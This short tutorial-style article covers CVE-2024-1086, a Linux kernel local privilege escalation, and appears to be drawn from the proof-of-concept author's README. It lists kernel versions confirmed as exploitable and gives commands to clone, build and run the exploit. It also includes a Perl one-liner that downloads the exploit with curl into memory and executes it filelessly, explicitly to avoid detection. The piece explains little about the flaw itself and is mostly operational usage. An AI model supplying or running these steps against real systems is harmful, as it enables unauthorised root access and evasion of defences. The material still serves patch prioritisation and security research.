Hardware

Linux Local Privilage Escalation Vuln. Explained

How the CVE-2024-1086 vulnerability works.

The CVE-2024-1086 is a universal local privilege escalation exploit, working on most Linux kernels between the versions of 5.14 and 6.6, including KernelCTF, Debian and Ubuntu. The success rate is 99.4% in KernelCTF images according to Notselwyn.

Kernel Versions Tested

Kernel VersionDistroDistro VersionStatus
v5.14.21n/an/aworking
v5.15.148n/an/aworking
v5.16.20n/an/aworking
v5.17.15n/an/aworking
v5.18.19n/an/aworking
v5.19.17n/an/aworking
v6.0.19n/an/aworking
v6.1.55KernelCTFMitigation v3working
v6.1.69DebianBookworm 6.1.0-17working
v6.1.69DebianBookworm 6.1.0-17working
v6.1.72KernelCTFLTSworking
v6.2.?UbuntuJammy v6.2.0-37working
v6.2.16n/an/aworking
v6.3.13n/an/aworking

Usage

Configuration

The default values should work on Debian, Ubuntu, and KernelCTF with a local shell. On the distros that haven't been tested, please make sure the kconfig values that can be specified in src/config.h match with the target kernel. If you are running the POC on a computer with more than 32GiB of RAM, make sure to increase CONFIG_PHYS_MEM. If you are running the exploit over SSH (into the test machine) or a reverse shell, you may want to toggle CONFIG_REDIRECT_LOG to 1 to avoid unnecessary network activity.

Building

If the build process is impractical for you, Notselwyn made a compiled x64 binary with the default config.

git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make

Running

Running the exploit is as easy as running:

./exploit

Fileless execution is also supported, in case of situations where detections need to be avoided. However, Perl needs to be installed on the target:

perl -e '
  require qw/syscall.ph/;
 
  my $fd = syscall(SYS_memfd_create(), $fn, 0);
  system "curl https://example.com/exploit -s >&$fd";
  exec {"/proc/$$/fd/$fd"} "memfd";
'

Special Thanks

This tutorial was mostly written with the help of the exploit's POC creator, Notselwyn, his POC can be found here. Thank you!